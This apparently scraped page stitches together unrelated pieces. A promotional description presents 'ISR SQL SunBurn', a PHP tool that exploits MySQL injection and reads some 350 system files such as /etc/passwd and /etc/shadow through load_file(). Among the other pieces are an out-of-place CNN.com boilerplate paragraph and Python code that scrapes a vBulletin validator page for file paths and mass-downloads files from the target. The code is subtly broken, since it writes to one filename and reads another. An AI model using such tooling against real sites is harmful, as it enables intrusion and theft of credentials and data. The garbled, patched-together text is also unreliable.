Description : This is the alpha (testing) version of ISR SQL SunBurn – ISS. The final version will contain more stuff, but it will remain private, this doesn’t mean that we won’t create a public version.
So what does ISR SQL SunBurn (ISS) do ? ISS is a php script that extracts all the possible information from a MySQL injection. Info (here we I don’t refer to colons/tables/etc … maybe in the near future). It searches and loads over 350 files with the help of load_file() – (ex /etc/passwd, /etc/shadow, etc)
Why did we decide to build this “tool”? It’s actually simple, it simplifies your work, and second of all, it’s a necessity. Hope I didn’t bore you with the description, here’s the video presentation of it.
CNN.com is among the world’s leaders in online news and information delivery. Staffed 24 hours, seven days a week by a dedicated staff in CNN’s world headquarters in Atlanta, Georgia, and in bureaus worldwide, CNN.com relies heavily on CNN’s global team of almost 4,000 news professionals. CNN.com features the latest multimedia technologies, from live video streaming to audio packages to searchable archives of news features and background information. The site is updated continuously throughout the day.
def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with urllib.request.urlopen(hurl) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" index = source.find(word) if index != -1: source = source[index + len(word):] value = source[:source.index("'")] hurl = url + "/validator.php?op={}".format(value) else: print("[!]Token not found.") print("[+]Obtaining paths...") with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find("<td>") if index != -1: lastk = line[index + 4:line.index("</td>")].strip(" ").strip(" ") index = line.find("<strong>") if index != -1: lastv = line[index + 8:line.index("</strong>")].strip(" ") if lastk != None and lastv != None: index = lastk.rfind(".") if index in (-1, 0): lastk = "[other] {}".format(lastk) else: lastk = "[{}] {}".format(lastk[index + 1:], lastk) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open("IPBlogs.txt", "w") as fout: fout.write(url + "\n") keys = sorted(dictionary.keys()) for key in keys: fout.write("{} ({})\n".format(key, dictionary[key]))
def download_data(files): print("[+]Searching and downloading files...") mthreads = 50 with open("vBlogs.txt", "r") as fin: url = fin.readline().strip("\n").strip("/") if files.find("*") == -1: hurl = url + "/" + files.strip("/") Download(hurl).start() else: ext = files[files.rindex(".") + 1:] for line in fin: pieces = line.strip("\n").split(" ") if pieces[0].count(ext) == 1: upath = pieces[1] hurl = url + "/" + upath.strip("/") while threading.active_count() > mthreads: pass Download(hurl).start() while threading.active_count() > 1: pass
Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin i nstalled...